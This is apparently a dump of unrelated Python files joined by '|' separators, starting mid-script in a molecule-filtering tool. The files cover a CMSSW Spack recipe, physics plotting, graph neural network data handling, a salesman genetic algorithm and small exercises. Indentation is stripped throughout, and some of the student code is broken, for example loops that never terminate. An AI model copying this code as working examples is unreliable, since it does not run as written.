NumHBA_d = f - float(range2)
g = float(sdf_all_small.get(sdf).filds1.get('NumRings')[0])
NumRings_a = g + float(range2)
NumRings_d = g - float(range2)
h = float(sdf_all_small.get(sdf).filds1.get('NumRotatableBonds')[0])
NumRotatableBonds_a = h + float(range2)
NumRotatableBonds_d = h - float(range2)
# count_in = 0
for sdf2 in sdf_all_big:
if sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0] in input_list:
continue
if sdf_all_small.get(sdf).filds1.get('SlogP') != empty_list:
if SlogP_d <= float(sdf_all_big.get(sdf2).filds1.get('SlogP')[0]) <= SlogP_a:
pass
else:
continue
else:
continue
if sdf_all_small.get(sdf).filds1.get('TPSA') != empty_list:
if TPSA_d <= float(sdf_all_big.get(sdf2).filds1.get('TPSA')[0]) <= TPSA_a:
pass
else:
continue
else:
continue
if sdf_all_small.get(sdf).filds1.get('AMW') != empty_list:
if AMW_d <= float(sdf_all_big.get(sdf2).filds1.get('AMW')[0]) <= AMW_a:
pass
else:
continue
else:
continue
if sdf_all_small.get(sdf).filds1.get('NumHeavyAtoms') != empty_list:
if NumHeavyAtoms_d <= float(sdf_all_big.get(sdf2).filds1.get('NumHeavyAtoms')[0]) <= NumHeavyAtoms_a:
pass
else:
continue
else:
continue
if sdf_all_small.get(sdf).filds1.get('NumHBD') != empty_list:
if NumHBD_d <= float(sdf_all_big.get(sdf2).filds1.get('NumHBD')[0]) <= NumHBD_a:
pass
else:
continue
else:
continue
if sdf_all_small.get(sdf).filds1.get('NumHBA') != empty_list:
if NumHBA_d <= float(sdf_all_big.get(sdf2).filds1.get('NumHBA')[0]) <= NumHBA_a:
pass
else:
continue
else:
continue
if sdf_all_small.get(sdf).filds1.get('NumRings') != empty_list:
if NumRings_d <= float(sdf_all_big.get(sdf2).filds1.get('NumRings')[0]) <= NumRings_a:
pass
else:
continue
else:
continue
if sdf_all_small.get(sdf).filds1.get('NumRotatableBonds') != empty_list:
if NumRotatableBonds_d <= float(sdf_all_big.get(sdf2).filds1.get('NumRotatableBonds')[0]) <= NumRotatableBonds_a:
pass
else:
continue
else:
continue
final_list.append(sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0])
status = 1
input_list.append(sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0])
writefile.write(str(sdf_all_small.get(sdf).filds1.get(idnumber_small)[0]) + '\t')
writefile.write(str(sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0]) + '\n')
print(str(sdf_all_big.get(sdf2).filds1.get(idnumber_big)[0]) + '\n')
# count_in += 1
# if count_in == 3:
break
if status == 0:
writefile.write(str(sdf_all_small.get(sdf).filds1.get(idnumber_small)[0]) + '\t')
writefile.write('no found\n')
print(str('no found\n'))
else:
status = 0
total_found += 1
if total_found > 100:
break
print(str(len(final_list)))
writefile.close()
if __name__ == "__main__":
load_sdf_big()
load_sdf_small()
input_list_fill()
find_by_pt()
|
from spack import *
from glob import glob
from string import Template
import re
import fnmatch
import shutil
from spack.util.executable import Executable
import sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import relrelink
class CmsswScram(Package):
"""CMSSW built as a scram project"""
homepage = "http://cms-sw.github.io"
url = "https://github.com/cms-sw/cmssw/archive/CMSSW_10_2_0.tar.gz"
version('10.3.0.pre3', git='https://github.com/cms-sw/cmssw.git', tag='CMSSW_10_3_0_pre3')
depends_on('scram')
depends_on('cmssw-config')
depends_on('cmssw-tool-conf')
depends_on('gmake')
depends_on('llvm')
if sys.platform == 'darwin':
patch('macos.patch')
else:
patch('linux.patch')
scram_arch = 'slc_amd64_gcc'
if sys.platform == 'darwin':
scram_arch = 'osx10_amd64_clang'
def install(self, spec, prefix):
scram = Executable(spec['scram'].prefix.bin+'/scram')
source_directory = self.stage.source_path
cmssw_version = 'CMSSW.' + str(self.version)
cmssw_u_version = cmssw_version.replace('.', '_')
scram_version = 'V%s' % spec['scram'].version
config_tag = '%s' % spec['cmssw-config'].version
gcc = which(spack_f77)
gcc_prefix = re.sub('/bin/.*$', '', self.compiler.f77)
gcc_machine = gcc('-dumpmachine', output=str)
gcc_ver = gcc('-dumpversion', output=str)
with working_dir(self.stage.path):
install_tree(source_directory, 'src')
install_tree(spec['cmssw-config'].prefix.bin, 'config')
with open('config/config_tag', 'w') as f:
f.write(config_tag+'\n')
f.close()
uc = Executable('config/updateConfig.pl')
uc('-p', 'CMSSW',
'-v', '%s' % cmssw_u_version,
'-s', '%s' % scram_version,
'-t', '%s' % spec['cmssw-tool-conf'].prefix,
'--keys', 'SCRAM_COMPILER=gcc',
'--keys', 'PROJECT_GIT_HASH=' + cmssw_u_version,
'--arch', '%s' % self.scram_arch)
scram('project', '-d', os.path.realpath(self.stage.path), '-b', 'config/bootsrc.xml')
project_dir =join_path(os.path.realpath(self.stage.path),cmssw_u_version)
with working_dir(project_dir, create=False):
matches = []
for f in glob('src/*/*/test/BuildFile*'):
matches.append(f)
for m in matches:
if os.path.exists(m):
os.remove(m)
# scram.add_default_env('LOCALTOP', project_dir)
# scram.add_default_env('CMSSW_BASE', project_dir)
scram.add_default_env(
'LD_LIBRARY_PATH', project_dir + '/lib/' + self.scram_arch)
scram.add_default_env(
'LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
scram.add_default_env(
'LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib64)
scram('setup', 'self')
scram('build', '-v', '-j8')
shutil.rmtree('tmp')
install_tree(project_dir,prefix+'/'+cmssw_u_version, symlinks=True)
relrelink(prefix+'/'+cmssw_u_version+'external')
with working_dir(join_path(prefix,cmssw_u_version), create=False):
# os.environ[ 'LOCALTOP' ] = os.getcwd()
# os.environ[ 'RELEASETOP' ] = os.getcwd()
# os.environ[ 'CMSSW_RELEASE_BASE' ] = os.getcwd()
# os.environ[ 'CMSSW_BASE' ] = os.getcwd()
scram('build', 'ProjectRename')
def setup_dependent_environment(self, spack_env, run_env, dspec):
cmssw_version = 'CMSSW.' + str(self.version)
cmssw_u_version = cmssw_version.replace('.', '_')
# spack_env.set('LOCALTOP', self.prefix + '/' + cmssw_u_version)
# spack_env.set('RELEASETOP', self.prefix + '/' + cmssw_u_version)
# spack_env.set('CMSSW_RELEASE_BASE', self.prefix)
# spack_env.set('CMSSW_BASE', self.prefix)
spack_env.append_path('LD_LIBRARY_PATH', self.prefix +
'/' + cmssw_u_version + '/lib/' + self.scram_arch)
spack_env.append_path(
'LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib64)
def setup_environment(self, spack_env, run_env):
cmssw_version = 'CMSSW.' + str(self.version)
cmssw_u_version = cmssw_version.replace('.', '_')
project_dir = join_path(os.path.realpath(self.stage.path), cmssw_u_version)
# spack_env.set('LOCALTOP', project_dir)
# spack_env.set('CMSSW_BASE',project_dir)
spack_env.append_path('LD_LIBRARY_PATH',
project_dir + '/lib/' + self.scram_arch)
spack_env.append_path('LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
spack_env.append_path(
'LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib64)
|
import numpy as np
import json
import os
from mea import auxfn
from mea.model.io_triangle import IOTriangle as green
from mea.model.triangle import Triangle as Model
from mea.transport import sigmadc
from scipy.integrate import simps
cwd = os.getcwd()
with open("statsparams0.json") as fin:
params = json.load(fin)
mu = params["mu"][0]
beta = params["beta"][0]
gf_aux = auxfn.GFAux(fin_sE_to=os.path.join(cwd, "self_moy.dat"), mu=mu, delta=0.001)
gf_aux.ac(fin_OME_default=os.path.join(cwd, "OME_default.dat"), fin_OME_input=os.path.join(cwd, "OME_input.dat"))
gf_aux.get_sEvec_w_list()
sEvec_cw_list = list(map(green().ir_to_c, gf_aux.sEvec_irw_list))
w_vec_list = gf_aux.w_vec_list
for (i, (sEvec_cw, w_vec)) in enumerate(zip(sEvec_cw_list, w_vec_list)):
model = Model(1.0, 0.4, mu, w_vec, sEvec_cw)
fout_name = "dos" + str(i) + ".dat"
fout_name_dos_trace = "dos_trace" + str(i) + ".txt"
dos = model.calc_dos(fout_name)
dos_trace = model.calc_dos_with_trace(fout_name_dos_trace)
dos_fct = np.loadtxt(fout_name)
dos_trace = np.loadtxt(fout_name_dos_trace)
print("dos normalisation = ", simps(dos_fct[:, 1], dos_fct[:, 0])/(2.0*np.pi))
print("dos_trace normalisation = ", simps(dos_trace[:, 1], dos_trace[:, 0])/(2.0*np.pi))
print("zkweight = ", model.zk_weight(np.pi, np.pi) )
#fout_fermi = "fermi_surface" + str(i) + ".dat"
#fermi_surface(model, w_value=0.0, fout=fout_fermi)
sdc = sigmadc.SigmaDC(model, beta=beta)
sdc.calc_sigmadc() |
s = float(input())
if s <= 400:
p = '15 %'
r = 0.15 * s
s += r
elif 400 < s <= 800:
p = '12 %'
r = 0.12 * s
s += r
elif 800 < s <= 1200:
p = '10 %'
r = 0.10 * s
s += r
elif 1200 < s <= 2000:
p = '7 %'
r = 0.07 * s
s += r
else:
p = '4 %'
r = 0.04 * s
s += r
print('Novo salario: {:.2f}\nReajuste ganho: {:.2f}\nEm percentual: {}'.format(s, r, p)) |
def workerStrike():
print("Workers are striking and half your resources have been stealing")
def factoryFire():
print("Your factory is on fire")
def worldWar():
print("The world falls into total war")
def theGreatDepression():
print("The great Depression")
def theSnap():
print("Snaps half of your resources away")
def elonInvests():
print("Elon Musk invests in your operation, upgrade on buidling of your choosing")
|
import subprocess
file = subprocess.Popen("C:\\Users\\ikira\\AppData\\Local\\WhatsApp\\WhatsApp.exe") |
import os
from abc import ABC, abstractmethod
import numpy as np
from scipy import sparse as sp
from scipy.sparse.linalg.eigen.arpack import eigsh
from app.utils.constant import GCN, NETWORK, LABEL, FEATURE,SYMMETRIC, GCN_POLY
from app.utils.util import invert_dict, map_set_to_khot_vector, map_list_to_floats
class Base_Graph(ABC):
'''Base class for the graph data structure'''
def __init__(self, model_name=GCN, sparse_features=True):
'''Method to initialise the graph'''
self.preprocessed = False
self.features = None
# nodes X features
self.adj = None
self.labels = None
# nodes X labels
# For optimisation
self.sparse_features = sparse_features
# We are saving the model_name as different models would need different kind of preprocessing.
self.model_name = model_name
# We are saving the mappings so that we do not have to make any assumptions about the data types any more.
# `label` and `node` are assumed to be strings as read from the input file.
self.label_to_id_map = {}
self.id_to_label_map = {}
self.node_to_id_map = {}
self.id_to_node_map = {}
# Mapping of node to labels and lables to nodes. We would use the latter for computing scores.
# Note that these ds are using the ids and not the raw strings read from the file.
self.label_to_node_map = {}
self.node_to_label_map = {}
self.edge_count = -1
def read_labels(self, label_data_path):
'''
Method to read the lables from `data_path`
'''
print("Reading labels from", str(label_data_path))
data = np.genfromtxt(label_data_path, dtype=np.dtype(str))
label_to_id_map = {label: id for id, label in enumerate(
set(
list(
map(lambda _data: _data[1], data)
)
)
)}
node_to_id_map = {node: id for id, node in enumerate(
set(
list(
map(lambda _data: _data[0], data)
)
)
)}
node_to_label_map = {}
label_to_node_map = {}
for node, label in map(lambda _data: (node_to_id_map[_data[0]], label_to_id_map[_data[1]]), data):
if node not in node_to_label_map:
node_to_label_map[node] = set()
node_to_label_map[node].add(label)
if label not in label_to_node_map:
label_to_node_map[label] = set()
label_to_node_map[label].add(node)
label_count = len(label_to_id_map.keys())
labels = np.asarray(list(
map(lambda index_set: map_set_to_khot_vector(index_set=index_set, num_classes=label_count)
, node_to_label_map.values())
))
assert (len(self.id_to_node_map.keys()) == len(self.node_to_label_map.keys())), \
"Some nodes are missing labels or ids"
assert (len(self.id_to_label_map.keys()) == len(self.label_to_node_map.keys())), \
"Some labels are missing nodes or ids"
node_count = labels.shape[0]
label_count = labels.shape[1]
# Updating all the class variables in one place
self.label_to_id_map = label_to_id_map
self.node_to_id_map = node_to_id_map
self.node_to_label_map = node_to_label_map
self.label_to_node_map = label_to_node_map
self.id_to_label_map, self.id_to_node_map = list(
map(lambda _dict: invert_dict(_dict), [
label_to_id_map, node_to_id_map
])
)
self.labels = labels
print("{} nodes read.".format(node_count))
print("{} labels read.".format(label_count))
def read_features(self, feature_data_path, one_hot=False, dim=100):
'''
Method to read the features from `feature_data_path`
'''
# Check if the `feature_data_path` is set else generate default feature vectors
node_count = len(self.id_to_node_map.keys())
if (feature_data_path):
features = np.genfromtxt(feature_data_path, dtype=np.dtype(str))
features = np.asarray(
list(map(map_list_to_floats, features[:, 1:])), dtype=np.int32)
if self.sparse_features:
features = sp.csr_matrix(features)
else:
if (one_hot):
# In case of one_hot features, we ignore the set value of `dim` and use dim = node_count.
dim = node_count
assert (dim > 0), "node count = ".format(dim)
if self.sparse_features:
features = sp.identity(dim).tocsr()
else:
features = sp.identity(dim).todense()
else:
features = np.random.uniform(low=0, high=0.5, size=(node_count, dim))
assert (features.shape[0] == node_count), "Missing features for some nodes"
self.features = features
print("{} features read for each node.".format(self.features.shape[1]))
def read_data(self, data_dir=None, dataset_name=None):
'''
Method to read the data corresponding to `dataset_name` from `data_dir`
:return:
Populates self.features, self.adjacency_matrix, self.labels
'''
data_path = os.path.join(data_dir, dataset_name)
print("Reading data from", str(data_path))
data_path_map = {}
data_path_map[NETWORK] = os.path.join(data_path, "network.txt")
data_path_map[LABEL] = os.path.join(data_path, "label.txt")
data_path_map[FEATURE] = os.path.join(data_path, "feature.txt")
self.read_labels(label_data_path=data_path_map[LABEL])
self.read_features(feature_data_path=data_path_map[FEATURE])
self.read_network(network_data_path=data_path_map[NETWORK])
@abstractmethod
def read_network(self, network_data_path):
'''
Method to read the network from `network_data_path`
'''
pass
def compute_supports(self, model_params, adj=None):
'''
Method to compute the supports for the graph before feeding to the model
'''
if(adj is None):
adj = self.adj
if(model_params.model_name==GCN_POLY):
supports = compute_chebyshev_polynomial(adj, degree=model_params.support_size - 1)
else:
# GCN, GCN_AE
supports = [transform_adj(adj=adj, is_symmetric=True)]
return supports
def get_node_mask(self, dataset_splits):
'''Method to obtain the train, validation and test masks for nodes (labels)'''
dataset_splits_sum = sum(dataset_splits)
dataset_splits = list(map(lambda x: x / dataset_splits_sum, dataset_splits))
current_index = 0
train_index = np.arange(current_index, current_index + int(self.node_size * dataset_splits[0]))
current_index = int(self.node_size * dataset_splits[0])
val_index = np.arange(current_index, current_index + int(self.node_size * dataset_splits[1]))
current_index = int(self.node_size * dataset_splits[1])
test_index = np.arange(current_index, current_index + int(self.node_size * dataset_splits[2]))
return train_index, val_index, test_index
def get_edge_mask(self, dataset_splits, adj = None, shuffle_data = True):
'''Method to obtain the train, validation and test mask for edges'''
dataset_splits_sum = sum(dataset_splits)
dataset_splits = list(map(lambda x: x / dataset_splits_sum, dataset_splits))
if(adj is None):
adj = self.adj
# We first remove the diagonal elements as we do not want to predict self-connections.
adj = sp.csr_matrix(adj - adj.diagonal())
adj.eliminate_zeros()
# Since we assume the graph to be undirected, we do not need to keep the entire graph
adj_triangular = sp.triu(adj, k=0)
node_count = self.adj.shape[0]
edges_list = list(zip(adj_triangular.row, adj_triangular.col))
edges_set = set(edges_list)
edges = np.asarray(edges_list)
edges_count = int(edges.shape[0])
train_edges_count = int(edges_count * dataset_splits[0])
validation_edges_count = int(edges_count * dataset_splits[1])
test_edges_count = edges_count - train_edges_count - validation_edges_count
edges_index = list(range(edges_count))
if(shuffle_data):
np.random.shuffle(edges_index)
train_edges_index = edges_index[:train_edges_count]
validation_edges_index = edges_index[train_edges_count:train_edges_count+validation_edges_count]
test_edges_index = edges_index[train_edges_count+validation_edges_count:]
train_edges = edges[train_edges_index]
validation_edges = edges[validation_edges_index]
test_edges = edges[test_edges_index]
edges_negative_sample = sample_negative_edges(required_edges_count=test_edges_count + validation_edges_count,
true_edges=edges_set,
node_count=node_count)
validation_edges_negative_sample = np.asarray(edges_negative_sample[:validation_edges_count])
test_edges_negative_sample = np.asarray(edges_negative_sample[validation_edges_count:])
train_index = train_edges
val_index = np.concatenate((validation_edges, validation_edges_negative_sample))
test_index = np.concatenate((test_edges, test_edges_negative_sample))
# We would pass along the adjacency matrix of train_index for the autoencoder loss
# We need to make sure that the new adjacency matrix is of the same dimension as the original one
data = np.ones(train_index.shape[0])
adj_ae = sp.csr_matrix((data, (train_index[:, 0], train_index[:, 1])),
shape=adj.shape)
# Since so far we considered the graph to be undirected, we need to add back the edges in
# the other direction as well
adj_ae = adj_ae + adj_ae.transpose()
return adj_ae, train_index, val_index, test_index
def symmetic_adj(adj):
'''
Method to preprocess the adjacency matrix `adj`
:return: symmetric adjacency matrix
Let us say the input matrix was [[1, 2]
[1, 1]]
To make it symmetric, we compute the max of the values at index pairs (i, j) and (j, i) and set both (i, j) and
(j, i) to that value.
'''
adj_t = adj.T
return adj + adj_t.multiply(adj_t > adj) - adj.multiply(adj_t > adj)
def transform_adj(adj, is_symmetric=True):
'''
Method to transform the adjacency matrix as described in section 2 of https://arxiv.org/abs/1609.02907
'''
adj = adj + sp.eye(adj.shape[0])
# Adding self connections
adj = renormalization_trick(adj, is_symmetric)
return adj
def renormalization_trick(adj, symmetric=True):
if symmetric:
# dii = sum_j(aij)
# dii = dii ** -o.5
d = sp.diags(
np.power(np.asarray(adj.sum(1)), -0.5).flatten(),
offsets=0)
# dii . adj . dii
return adj.dot(d).transpose().dot(d).tocsr()
def get_identity(size):
'''return indentity matrix of the given size'''
return sp.eye(m=size)
def compute_chebyshev_polynomial(adj, degree):
'''Method to compute Chebyshev Polynomial upto degree `degree`'''
adj_normalized = renormalization_trick(adj=adj)
identity_size = adj.shape[0]
# laplacian_normalized = In - adj_normalized
laplacian_normalized = get_identity(identity_size) - adj_normalized
eigval, _ = eigsh(A = laplacian_normalized, k = 1, which="LM")
# L = 2L/lamba_max - In
laplacian_normalized_scaled = (2.0 * laplacian_normalized)/eigval[0] - get_identity(identity_size)
Tk = [get_identity(identity_size), laplacian_normalized_scaled]
# Tk = [Tk[-1] + Tk[-2]]
for i in range(2, degree+1):
Tk.append(_compute_chebyshev_recurrence(current = Tk[-1],
previous = Tk[-2],
X = laplacian_normalized_scaled))
return Tk
def _compute_chebyshev_recurrence(current, previous, X):
'''Method to compute the next term of the Chebyshev recurrence'''
next = 2 * X.dot(current) - previous
return next
def sample_negative_edges(required_edges_count, true_edges, node_count):
'''Method to sample negative edges'''
edges_negative_sample = set()
edges_negative_sample_count = 0
while edges_negative_sample_count < required_edges_count:
# randomly sample two nodes
i = np.random.randint(0, node_count)
j = np.random.randint(0, node_count)
to_insert = True
if (i == j):
# self-connection, so ignore
to_insert = False
elif (((i, j) in true_edges) or (j, i) in true_edges):
# True edge so ignore
to_insert = False
elif (((i, j) in edges_negative_sample) or ((j, i) in edges_negative_sample)):
# Already added so ignore
to_insert = False
if (to_insert):
edges_negative_sample.add((i, j))
edges_negative_sample_count += 1
return list(edges_negative_sample)
|
print(200000)
for i in range(200000):
print('a', end='')
|
#!/bin/python3
from __future__ import print_function
import sys
from operator import add
from pyspark.sql import SparkSession
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Usage: zad6 <file> <col_name> [<col_name_2>...<col_name_n.]", file=sys.stderr)
exit(-1)
spark = SparkSession\
.builder\
.appName("Select columns")\
.getOrCreate()
columns = ""
for i in range(2, len(sys.argv)):
columns += sys.argv[i]
columns += " "
lines = spark.read.text(sys.argv[1]).rdd.map(lambda r: r[0])
countsR = lines.pipe('python3 ./mapper_z6.py '+columns)\
.pipe('python3 ./reducer_z6.py')
for line in countsR.collect():
print(line)
spark.stop() |
from django.shortcuts import render
# Create your views here.
def homeview(request):
question="Hello"
data={
'quest':question,
}
return render(request,"index.html",data) |
import random
import math
import turtle
import copy
from functools import *
def generate_map_point(x_range, y_range, loc): #generates a random point
#print("generating location point: " + str(loc))
return (random.randint(-(x_range), x_range), random.randint(-(y_range), y_range))
def generate_map_points(x_range, y_range, locations): #generates a list of random points
return list(map(partial(generate_map_point, x_range, y_range), range(locations)))
def generate_map_routes(map_points, total_routes): # generates different map routes
map_routes=[]
for x in range(total_routes):
print("map route: " + str(x))
map_routes.append(copy.deepcopy(map_points))#populate in lecturer words
random.shuffle(map_routes[x])
return map_routes
def calculate_distance(starting_x, starting_y, destination_x, destination_y):
distance = math.hypot(destination_x - starting_x, destination_y - starting_y)
return distance
def calculate_path(map_points):
distance = 0
i = 0
while i+1 < len(map_points):
distance = distance + calculate_distance(map_points[i][0],map_points[i][1],map_points[i+1][0],map_points[i+1][1])
i=i+1
distance = distance + calculate_distance(map_points[i][0],map_points[i][1],map_points[0][0],map_points[0][1])
return distance
def fitness_function(map_routes,best_solution):
best_solution = copy.deepcopy(map_routes[0])
best_solution_score = 0
ranking = []
for x in range(len(map_routes)):
score = 0
score += calculate_path(map_routes[x])
ranking.append(score)
if score > best_solution_score:
best_solution = x
best_solution_score = score
sorted_map_routes = [x for _,x in sorted(zip(ranking,map_routes), reverse=True)]
return sorted_map_routes
def mating_function(map_routes, mutation_rate, elite_threshold):
new_map_routes = []
for x in map_routes:
parent_1 = copy.deepcopy(map_routes[random.randint(0,int(len(map_routes)*elite_threshold))])
parent_2 = copy.deepcopy(x)
mutated_child = mutate(breed(parent_1,parent_2),mutation_rate)
new_map_routes.append(mutated_child)
print(new_map_routes)
return new_map_routes
def breed(parent_1, parent_2):
cut_points = []
random_cut = random.uniform(0,1)
rest_cut = 1-random_cut
child = []
dna_1 = []
dna_2 = []
x=0
while x<=(len(parent_1)*random_cut):
dna_1.append(random.choice(parent_1))
while x<=(len(parent_2)*rest_cut):
dna_2.append(random.choice(parent_2))
child = dna_1 + dna_2
return child
def mutate(child, mutation_rate):
mutated_child=[]
x=0
for x in range(len(child)):
if(random.random(0,1) < mutation_rate):
y = random.randint (0,len(child)-1)
dna_1 = child[x]
dna_2 = child[y]
child[x] = dna_2
child[y] = dna_1
mutated_child.append(child[y])
return mutated_child
print("Welcome to salesman problem program \o/")
#print(mating_function((fitness_function(generate_map_routes((generate_map_points(50, 50, 10)),3),0),(generate_map_routes((generate_map_points(50, 50, 10)),3),0))0.5,0.1))
print(mating_function(fitness_function((generate_map_routes((generate_map_points(50, 50, 10)),3)),0),0.5,0.1))
#(generate_map_routes((generate_map_points(50, 50, 10)),3))
|
def update_dictionary(d, key, value):
if d.get(key) is None:
if d.get(2 * key) is None:
d[2 * key] = [value]
else:
d[2 * key].append(value)
else:
d.get(key).append(value)
d = {}
print(update_dictionary(d, 1, -1))
print(d)
update_dictionary(d, 2, -2)
print(d)
update_dictionary(d, 1, -3)
print(d)
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#########################################################################################
# #
# hrc_dose_plot_exposure_stat.py: plotting trendings of avg, min, max, 1 sigma #
# 2 sigma, and 3 sigma trends #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 09, 2021 #
# #
#########################################################################################
import sys
import os
import string
import re
import copy
import numpy as np
import time
#
#--- pylab plotting routine related modules
#
import matplotlib as mpl
if __name__ == '__main__':
mpl.use('Agg')
from pylab import *
import matplotlib.pyplot as plt
import matplotlib.font_manager as font_manager
import matplotlib.lines as lines
#
#--- reading directory list
#
path = '/data/mta/Script/Exposure/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append path to a private folder
#
sys.path.append(mta_dir)
sys.path.append(bin_dir)
#
import mta_common_functions as mcf
import exposureFunctions as expf
#--------------------------------------------------------------------------------------------
#--- hrc_dose_plot_exposure_stat: read hrc database, and plot history of exposure ---
#--------------------------------------------------------------------------------------------
def hrc_dose_plot_exposure_stat(indir = 'NA', outdir = 'NA', clean = 'NA'):
"""
read hrc database, and plot history of exposure.
input: indir --- data directory path
outdir --- output directory path
output: outdir/<hrc>.png
"""
#
#--- setting indir and outdir if not given
#
if indir == 'NA':
indir = data_out
if outdir == 'NA':
outdir = plot_dir
#
#--- clean up the data sets before reading
#
if clean != 'NA':
expf.clean_data(indir)
#
#--- start plotting data
#
for detector in ('hrci', 'hrcs'):
#
#--- read data
#
idata = expf.readExpData(indir, detector)
#
#--- plot data
#
try:
plot_hrc_dose(idata)
#
#--- trim the edge of the plot and move to the plot directory
#
outfile = detector + '.png'
cmd = 'convert hrc.png -trim ' + plot_dir + detector + '.png'
os.system(cmd)
mcf.rm_files('hrc.png')
except:
pass
#--------------------------------------------------------------------------------------------
#--- plot_hrc_dose: plot 6 panels of hrc quantities. --
#--------------------------------------------------------------------------------------------
def plot_hrc_dose(idata):
"""
plot 6 panels of hrc quantities.
input: idata --- a list of lists of data of:
date, amean, amin, amax, accs1, accs2, accs3
dmean, dmin, dmax, dff1, dff2, dff3
output: ./hrc.png
"""
#
#--- open data
#
(date, year, month, amean, astd, amin, amin_pos, \
amax, amax_pos, accs1, accs2, accs3, dmean, dstd,\
dmin, dmin_pos, dmax, dmax_pos, dffs1, dffs2, dffs3) = idata
plt.close('all')
#
#---- set a few parameters
#
mpl.rcParams['font.size'] = 9
props = font_manager.FontProperties(size=6)
plt.subplots_adjust(hspace=0.05)
plt.subplots_adjust(wspace=0.12)
#
#--- mean
#
ax1 = plt.subplot(3,2,1)
plot_panel(date, dmean, 'Average', ax1)
#
#--- mean cumulative
#
ax2 = plt.subplot(3,2,2)
plot_panel(date, amean, 'Average Cumulative', ax2)
#
#--- max
#
ax3 = plt.subplot(3,2,3)
plot_panel(date, dmax, 'Maximum', ax3)
#
#--- max cumulative
#
ax4 = plt.subplot(3,2,4)
plot_panel(date, amax, 'Maximum Cumulative', ax4)
#
#--- 68, 95, and 99.6% levels
#
labels = ["68% Value ", "95% Value", "99.7% Value"]
ax5 = plt.subplot(3,2,5)
plot_three_values(date, dffs1, dffs2, dffs3, labels, ax5)
#
#--- 68, 95, and 99.6% cumulative
#
ax6 = plt.subplot(3,2,6)
plot_three_values(date, accs1, accs2, accs3, labels, ax6)
#
#--- plot x axis tick label only at the bottom ones
#
for ax in ax1, ax2, ax3, ax4, ax5, ax6:
if ax != ax5 and ax != ax6:
for label in ax.get_xticklabels():
label.set_visible(False)
else:
pass
#
#--- putting axis names
#
ax3.set_ylabel('Counts per Pixel')
ax5.set_xlabel('Year')
ax6.set_xlabel('Year')
#
#--- set the size of the plotting area in inch (width: 10.0in, height 5.0in)
#
fig = matplotlib.pyplot.gcf()
fig.set_size_inches(10.0, 10.0)
#
#--- save the plot in png format
#
plt.savefig('hrc.png', format='png', dpi=300)
plt.close('all')
#--------------------------------------------------------------------------------------------
#--- plot_panel: plotting each panel for a given "ax" ---
#--------------------------------------------------------------------------------------------
def plot_panel(x, y, label, ax):
"""
plotting each panel for a given "ax".
input: x --- a list of x values
y --- a list of y values
label --- ax label
ax --- designation of the plot
output: returning the part of the plot created
"""
#
#--- x axis setting: here we assume that x is already sorted
#
xmin = x[0]
xmax = x[len(x) -1]
diff = xmax - xmin
xmin = xmin - 0.05 * diff
xmax = xmax + 0.05 * diff
xmin = int(xmin)
xmax = int(xmax) + 1
xbot = xmin + 0.05 * diff
#
#--- y axis setting
#
ymin = min(y)
ymax = max(y)
#
#--- for the case, ymin == ymax,
#
if ymin == ymax:
ymax += 1
diff = ymax - ymin
ymin = ymin - 0.01 * diff
if ymin < 0:
ymin = 0
ymax = ymax + 0.1 * diff
ytop = ymax - 0.12 * diff
#
#--- setting panel
#
ax.set_autoscale_on(False) #---- these three may not be needed for the new pylab, but
ax.set_xbound(xmin,xmax) #---- they are necessary for the older version to set
ax.set_xlim(left=xmin, right=xmax, auto=False)
ax.set_ylim(bottom=ymin, top=ymax, auto=False)
#
#--- plot line
#
plt.plot(x, y, color='blue', lw=1, marker='+', markersize=1.5)
plt.text(xbot, ytop, label)
#------------------------------------------------------------------------------------
#--- plot_three_values: plotting three data on a signle panel for a given ax ---
#------------------------------------------------------------------------------------
def plot_three_values(x, s1, s2, s3, labels, ax):
"""
plotting three data on a signle panel for a given ax
input: x --- a list of x values
s1 --- a list of y values set 1
s2 --- a list of y values set 2
s3 --- a list of y values set 3
labels --- a list of ax labels
ax --- designation of the plot
output: returning the part of the plot created
"""
#
#--- x axis setting: here we assume that x is already sorted
#
xmin = x[0]
xmax = x[len(x) -1]
diff = xmax - xmin
xmin = xmin - 0.05 * diff
xmax = xmax + 0.05 * diff
xmin = int(xmin)
xmax = int(xmax) + 1
xbot = xmin + 0.05 * diff
#
#--- y axis setting
#
ymin = 0
ymax = max(s3)
ymax = 1.1 * ymax
#
#--- for the case, ymin == ymax,
#
if ymin == ymax:
ymax += 1
diff = ymax - ymin
ymin = ymin - 0.01 * diff
if ymin < 0:
ymin = 0
ytop = 0.88 * ymax
#
#--- setting panel
#
ax.set_autoscale_on(False) #---- these three may not be needed for the new pylab, but
ax.set_xbound(xmin,xmax) #---- they are necessary for the older version to set
ax.set_xlim(left=xmin, right=xmax, auto=False)
ax.set_ylim(bottom=ymin, top=ymax, auto=False)
#
#--- plot line
#
p1, = plt.plot(x, s1, color='blue', lw=1, marker='', markersize=0.0)
p2, = plt.plot(x, s2, color='green', lw=1, marker='', markersize=0.0)
p3, = plt.plot(x, s3, color='orange',lw=1, marker='', markersize=0.0)
legend([p1, p2, p3], [labels[0], labels[1], labels[2]], loc=2, fontsize=9)
#------------------------------------------------------------------------
if __name__ == '__main__':
hrc_dose_plot_exposure_stat(clean ='NA')
|
from __future__ import annotations
from rubicon_ml.domain.artifact import Artifact
from rubicon_ml.domain.dataframe import Dataframe
from rubicon_ml.domain.experiment import Experiment
from rubicon_ml.domain.feature import Feature
from rubicon_ml.domain.metric import Metric
from rubicon_ml.domain.parameter import Parameter
from rubicon_ml.domain.project import Project
__all__ = ["Artifact", "Dataframe", "Experiment", "Feature", "Metric", "Parameter", "Project"]
|
from rest_framework.serializers import Serializer
from .models import Employee,EmployeeSerializer
from rest_framework.views import APIView
